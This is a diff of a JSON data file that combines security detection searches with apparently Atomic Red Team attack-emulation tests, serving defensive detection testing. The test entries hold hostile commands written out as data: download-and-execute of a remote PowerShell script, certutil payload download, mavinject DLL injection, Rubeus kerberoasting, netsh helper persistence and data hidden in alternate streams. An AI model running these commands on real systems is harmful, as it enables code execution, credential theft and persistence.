loading them into memory.", - "search": "`wineventlog_system` EventCode=7045 ImagePath=\"*\\\\windows\\\\winSxS\\\\*\" ImagePath=\"*\\Werfault.exe\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_snake_malware_service_create_filter`", + "search": "`wineventlog_system` EventCode=7045 ImagePath=\"*\\\\windows\\\\winSxS\\\\*\" ImagePath=\"*\\Werfault.exe\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_snake_malware_service_create_filter`", "tags": { "name": "Windows Snake Malware Service Create", "analytic_story": [ @@ -649894,15 +656827,15 @@ }, { "description": "Create dependency resources using terraform\n", - "prereq_command": "try {if (Test-Path $PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate ){ exit 0 } else {exit 1}} catch {exit 1}\n", - "get_prereq_command": "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/\nterraform init\nterraform apply -auto-approve\n" + "prereq_command": "try {if (Test-Path \"$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate\" ){ exit 0 } else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "cd \"$PathToAtomicsFolder/T1078.004/src/T1078.004-2/\"\nterraform init\nterraform apply -auto-approve\n" } ], "executor": { "command": "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-AzAccount -Credential $creds\nNew-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}\n", "name": "powershell", "elevation_required": false, - "cleanup_command": "Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force\ncd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/\nterraform destroy -auto-approve\n" + "cleanup_command": "Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force\ncd \"$PathToAtomicsFolder/T1078.004/src/T1078.004-2/\"\nterraform destroy -auto-approve\n" } }, { @@ -651221,7 +658154,7 @@ { "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. ", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", "tags": { "name": "Azure AD Authentication Failed During MFA Challenge", "analytic_story": [ @@ -651237,7 +658170,7 @@ "Delivery", "Installation" ], - "message": "User $body.properties.userPrincipalName$ failed to pass MFA challenge", + "message": "User $userPrincipalName$ failed to pass MFA challenge", "mitre_attack_id": [ "T1586", "T1586.003", @@ -651365,7 +658298,7 @@ { "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(userPrincipalName) by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(ipAddress) as ipAddress by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "Azure AD Multiple Failed MFA Requests For User", "analytic_story": [ @@ -651381,7 +658314,7 @@ "Delivery", "Installation" ], - "message": "Multiple Failed MFA requests for user $body.properties.userPrincipalName$", + "message": "Multiple Failed MFA requests for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -651399,13 +658332,6 @@ "role": [ "Victim" ] - }, - { - "name": "ipAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], "risk_score": 54, @@ -651509,7 +658435,7 @@ { "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationDetails{}.succeeded=true body.properties.appDisplayName=\"Azure Active Directory PowerShell\" | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName=\"Microsoft Azure PowerShell\" | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", "tags": { "name": "Azure AD Successful PowerShell Authentication", "analytic_story": [ @@ -651525,7 +658451,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ using PowerShell.", + "message": "Successful authentication for user $userPrincipalName$ using PowerShell.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -651641,7 +658567,7 @@ { "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationRequirement=singleFactorAuthentication body.properties.authenticationDetails{}.succeeded=true | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", "tags": { "name": "Azure AD Successful Single-Factor Authentication", "analytic_story": [ @@ -651657,7 +658583,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ without MFA", + "message": "Successful authentication for user $userPrincipalName$ without MFA", "mitre_attack_id": [ "T1586", "T1586.003", @@ -652010,7 +658936,7 @@ "Delivery", "Installation" ], - "message": "User $user$ is modifying an instance $dest$ for the first time.", + "message": "User $user$ is modifying an instance $object_id$ for the first time.", "mitre_attack_id": [ "T1078.004", "T1078" @@ -652025,13 +658951,6 @@ "role": [ "Attacker" ] - }, - { - "name": "dest", - "type": "Endpoint", - "role": [ - "Victim" - ] } ], "risk_score": 42, @@ -652250,7 +659169,7 @@ { "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", + "search": "`gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "GCP Multiple Failed MFA Requests For User", "analytic_story": [ @@ -652286,7 +659205,7 @@ ] }, { - "name": null, + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" @@ -655442,7 +662361,8 @@ "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 c:\\ADS\\\\procexp.cab c:\\ADS\\\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\\\procexp.exe > c:\\ADS\\\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab c:\\ADS\\\\autoruns.exe c:\\ADS\\\\cabtest.txt:autoruns.cab\nprint /D:c:\\ADS\\\\file.txt:autoruns.exe c:\\ADS\\\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ADS\\\\file.txt:evilreg.reg\nregedit /E c:\\ADS\\\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\\\file.txt:file.bat\nesentutl.exe /y c:\\ADS\\\\autoruns.exe /d c:\\ADS\\\\file.txt:autoruns.exe /o \n", "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,c:\\windows\\system32\\cmd.exe,>,`\"C:\\Users\\Public\\Libraries\\yanki\\desktop.ini:desktop.ini`\"\"\n", "echo cmd /c echo \"Shell code execution.\"> %temp%\\T1564.004_has_ads_cmd.txt:adstest.txt\nfor /f \"usebackq delims=?\" %i in (%temp%\\T1564.004_has_ads_cmd.txt:adstest.txt) do %i\n", - "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path $env:TEMP\\T1564.004_has_ads_powershell.txt -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n" + "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path $env:TEMP\\T1564.004_has_ads_powershell.txt -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n", + "md %temp%\\...$.......::$index_allocation\necho too many secrets > %temp%\\...$.......::$index_allocation\\secrets.txt\n" ], "commands": [], "queries": [], @@ -655561,6 +662481,31 @@ "cleanup_command": "Remove-Item -Path #{file_name} -ErrorAction Ignore\n", "name": "powershell" } + }, + { + "name": "Create Hidden Directory via $index_allocation", + "auto_generated_guid": "3e6791e7-232c-481c-a680-a52f86b83fdf", + "description": "Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution, \nrun \"dir /A /Q /R\" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the \nalternate data stream, run \"type %temp%\\...$.......::$index_allocation\\secrets.txt\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "folder_name": { + "description": "File name of file to create inside the folder.", + "type": "string", + "default": "%temp%\\...$.......::$index_allocation" + }, + "hidden_filename": { + "description": "Name of the files containing the hidden information", + "type": "string", + "default": "secrets.txt" + } + }, + "executor": { + "command": "md #{folder_name}\necho too many secrets > #{folder_name}\\#{hidden_filename}\n", + "cleanup_command": "rmdir /S /Q #{folder_name} >nul 2>&1\n", + "name": "command_prompt" + } } ] } @@ -656126,13 +663071,13 @@ }, { "description": "Rubeus must exist\n", - "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + "prereq_command": "if(Test-Path -Path \"#{local_folder}\\#{local_executable}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-Webrequest -Uri #{rubeus_url} -OutFile \"#{local_folder}\\#{local_executable}\"\n" } ], "executor": { "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", - "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "cleanup_command": "Remove-Item \"#{local_folder}\\#{out_file}\" -ErrorAction Ignore\n", "name": "powershell", "elevation_required": false } @@ -656446,7 +663391,7 @@ { "name": "ServicePrincipalNames Discovery with PowerShell", "description": "The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \\\nWhat is a ServicePrincipleName? \\\nA service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\\\nThe following analytic identifies the use of KerberosRequestorSecurityToken class within the script block. Using .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivelant of using setspn.exe. \\\nDuring triage, review parallel processes for further suspicious activity.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*KerberosRequestorSecurityToken*\" | stats count min(_time) as firstTime max(_time) as lastTime by ScriptBlockText Opcode Computer UserID EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `serviceprincipalnames_discovery_with_powershell_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*KerberosRequestorSecurityToken*\" | stats count min(_time) as firstTime max(_time) as lastTime by ScriptBlockText Opcode Computer UserID EventCode | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `serviceprincipalnames_discovery_with_powershell_filter`", "tags": { "name": "ServicePrincipalNames Discovery with PowerShell", "analytic_story": [ @@ -656462,7 +663407,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $Computer$ by user $UserID$ attempting to identify service principle names.", + "message": "An instance of attempting to identify service principle detected on $dest$ names.", "mitre_attack_id": [ "T1558.003" ], @@ -656471,32 +663416,18 @@ ], "observable": [ { - "name": "UserID", + "name": "user", "type": "User", "role": [ "Victim" ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 80, @@ -656652,7 +663583,7 @@ { "name": "Windows PowerView Kerberos Service Ticket Request", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainSPNTicket` commandlets with specific parameters. This commandlet is a part of PowerView, a PowerShell tool used to perform enumeration and discovery on Windows Active Directory networks. As the name suggests, this commandlet is used to request the kerberos ticket for a specified service principal name (SPN). Once the ticket is received, it may be cracked using password cracking tools like hashcat to extract the password of the SPN account. Red Teams and adversaries alike may leverage PowerView and these commandlets to identify accounts that can be attacked with the Kerberoasting technique.", - "search": "`powershell` EventCode=4104 ScriptBlockText=*Get-DomainSPNTicket* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powerview_kerberos_service_ticket_request_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=*Get-DomainSPNTicket* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powerview_kerberos_service_ticket_request_filter`", "tags": { "name": "Windows PowerView Kerberos Service Ticket Request", "analytic_story": [ @@ -656665,7 +663596,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerView commandlets used for requesting SPN service ticket executed on $Computer$", + "message": "PowerView commandlets used for requesting SPN service ticket executed on $dest$", "mitre_attack_id": [ "T1558", "T1558.003" @@ -656675,8 +663606,8 @@ ], "observable": [ { - "name": "Client_Address", - "type": "Endpoint", + "name": "dest", + "type": "Hostname", "role": [ "Victim" ] @@ -656711,7 +663642,7 @@ { "name": "Windows PowerView SPN Discovery", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` or `Get-NetUSer` commandlets with specific parameters. These commandlets are part of PowerView, a PowerShell tool used to perform enumeration and discovery on Windows Active Directory networks. As the names suggest, these commandlets are used to identify domain users in a network and combining them with the `-SPN` parameter allows adversaries to discover domain accounts associated with a Service Principal Name (SPN). Red Teams and adversaries alike may leverage PowerView and these commandlets to identify accounts that can be attacked with the Kerberoasting technique.", - "search": "`powershell` EventCode=4104 (ScriptBlockText =*Get-NetUser* OR ScriptBlockText=*Get-DomainUser*) ScriptBlockText= *-SPN* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_powerview_spn_discovery_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText =*Get-NetUser* OR ScriptBlockText=*Get-DomainUser*) ScriptBlockText= *-SPN* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_powerview_spn_discovery_filter`", "tags": { "name": "Windows PowerView SPN Discovery", "analytic_story": [ @@ -656724,7 +663655,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "PowerView commandlets used for SPN discovery executed on $Computer$", + "message": "PowerView commandlets used for SPN discovery executed on $dest$", "mitre_attack_id": [ "T1558", "T1558.003" @@ -656734,8 +663665,8 @@ ], "observable": [ { - "name": "Client_Address", - "type": "Endpoint", + "name": "dest", + "type": "Hostname", "role": [ "Victim" ] @@ -659888,7 +666819,7 @@ } ], "command_list": [ - "$mypid = (Start-Process notepad -PassThru).id\nmavinject $mypid /INJECTRUNNING \\T1055.001\\src\\x64\\T1055.001.dll\nStop-Process -processname notepad\n", + "$mypid = (Start-Process notepad -PassThru).id\nmavinject $mypid /INJECTRUNNING \"\\T1055.001\\src\\x64\\T1055.001.dll\"\nStop-Process -processname notepad\n", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n" ], @@ -659925,12 +666856,12 @@ "dependencies": [ { "description": "Utility to inject must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll\" -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll\" -OutFile \"#{dll_payload}\"\n" } ], "executor": { - "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING \"#{dll_payload}\"\nStop-Process -processname notepad\n", "name": "powershell", "elevation_required": true } @@ -664571,10 +671502,9 @@ "tags": { "name": "ASL AWS New MFA Method Registered For User", "analytic_story": [ - "Compromised User Account", - "Azure Active Directory Account Takeover" + "AWS Identity and Access Management Account Takeover" ], - "asset_type": "Azure Active Directory", + "asset_type": "AWS Account", "cis20": [ "CIS 10" ], @@ -664748,10 +671678,9 @@ "tags": { "name": "AWS New MFA Method Registered For User", "analytic_story": [ - "Compromised User Account", - "Azure Active Directory Account Takeover" + "AWS Identity and Access Management Account Takeover" ], - "asset_type": "Azure Active Directory", + "asset_type": "AWS Account", "cis20": [ "CIS 10" ], @@ -664759,7 +671688,7 @@ "Exploitation", "Installation" ], - "message": "A new virtual device $virtualMFADeviceName$ is added to user $user_arn$", + "message": "A new virtual device $virtualMFADeviceName$ is added to user $user_arn$", "mitre_attack_id": [ "T1556", "T1556.006" @@ -664769,7 +671698,7 @@ ], "observable": [ { - "name": "user_name", + "name": "user_arn", "type": "User", "role": [ "Victim" @@ -664813,7 +671742,7 @@ { "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users.", - "search": "`azuread` body.category=AuditLogs body.operationName=\"Disable Strong Authentication\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, type, body.operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", + "search": "`azuread` category=AuditLogs operationName=\"Disable Strong Authentication\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, type, operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", "tags": { "name": "Azure AD Multi-Factor Authentication Disabled", "analytic_story": [ @@ -664902,7 +671831,7 @@ { "name": "Azure AD New MFA Method Registered For User", "description": "The following analytic identifies the registration of a new Multi Factor authentication method for an Azure AD account. Adversaries who have obtained unauthorized access to an Azure AD account may register a new MFA method to maintain persistence.", - "search": " `azuread` category=AuditLogs operationName=\"User registered security info\" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats values(userPrincipalName) by _time, resultDescription, result, callerIpAddress | `azure_ad_new_mfa_method_registered_for_user_filter`", + "search": " `azuread` category=AuditLogs operationName=\"User registered security info\" properties.operationType=Add | rename properties.* as * | rename targetResources{}.* as * | stats values(userPrincipalName) as userPrincipalName by _time, resultDescription, result, callerIpAddress | `azure_ad_new_mfa_method_registered_for_user_filter`", "tags": { "name": "Azure AD New MFA Method Registered For User", "analytic_story": [ @@ -665082,18 +672011,11 @@ "DE.CM" ], "observable": [ - { - "name": "dest", - "type": "Endpoint", - "role": [ - "Victim" - ] - }, { "name": "user", "type": "User", "role": [ - "Attacker" + "Victim" ] } ], @@ -665116,8 +672038,8 @@ }, { "name": "O365 Excessive SSO logon errors", - "description": "This search detects accounts with high number of Single Sign ON (SSO) logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse.", - "search": "`o365_management_activity` Workload=AzureActiveDirectory LogonError=SsoArtifactInvalidOrExpired | stats count min(_time) as firstTime max(_time) as lastTime by LogonError ActorIpAddress UserAgent UserId | where count > 5 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`", + "description": "The following analytic detects accounts with high number of Single Sign ON (SSO) logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse.", + "search": "`o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso* Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime by user src_ip LogonError user_agent UserId Operation Workload authentication_method authentication_service| where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`", "tags": { "name": "O365 Excessive SSO logon errors", "analytic_story": [ @@ -665132,7 +672054,7 @@ "Exploitation", "Installation" ], - "message": "User $UserId$ has caused excessive number of SSO logon errors from $ActorIpAddress$ using UserAgent $UserAgent$.", + "message": "User $user$ has caused excessive number of SSO logon errors from $src_ip$ using UserAgent $UserAgent$.", "mitre_attack_id": [ "T1556" ], @@ -665141,14 +672063,14 @@ ], "observable": [ { - "name": "ActorIpAddress", + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" ] }, { - "name": "UserId", + "name": "user", "type": "User", "role": [ "Victim" @@ -665439,7 +672361,7 @@ } ], "command_list": [ - "mavinject $pid /INJECTRUNNING \\T1056.004\\bin\\T1056.004x64.dll\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n" + "mavinject $pid /INJECTRUNNING \"\\T1056.004\\bin\\T1056.004x64.dll\"\nInvoke-WebRequest https://www.example.com -UseBasicParsing\n" ], "commands": [], "queries": [], @@ -665474,12 +672396,12 @@ "dependencies": [ { "description": "T1056.004x64.dll must exist on disk at specified location (#{file_name})\n", - "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"#{file_name}\" -UseBasicParsing\n" + "prereq_command": "if (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"#{file_name}\" -UseBasicParsing\n" } ], "executor": { - "command": "mavinject $pid /INJECTRUNNING #{file_name}\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", + "command": "mavinject $pid /INJECTRUNNING \"#{file_name}\"\nInvoke-WebRequest #{server_name} -UseBasicParsing\n", "name": "powershell", "elevation_required": true } @@ -667047,7 +673969,7 @@ { "name": "Disabling SystemRestore In Registry", "description": "The following search identifies the modification of registry related in disabling the system restore of a machine. This event or behavior are seen in some RAT malware to make the restore of the infected machine difficult and keep their infection on the box.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore\\\\DisableSR\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore\\\\DisableConfig\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore\\\\DisableSR\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore\\\\DisableConfig\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_systemrestore_in_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore\\\\DisableSR\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore\\\\DisableConfig\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore\\\\DisableSR\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore\\\\DisableConfig\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_systemrestore_in_registry_filter`", "tags": { "name": "Disabling SystemRestore In Registry", "analytic_story": [ @@ -667463,7 +674385,7 @@ } ], "command_list": [ - "netsh.exe add helper \\T1546.007\\bin\\NetshHelper.dll\ntaskkill /im notepad.exe /t /f > NUL 2>&1\n" + "netsh.exe add helper \"\\T1546.007\\bin\\NetshHelper.dll\"\ntaskkill /im notepad.exe /t /f > NUL 2>&1\n" ], 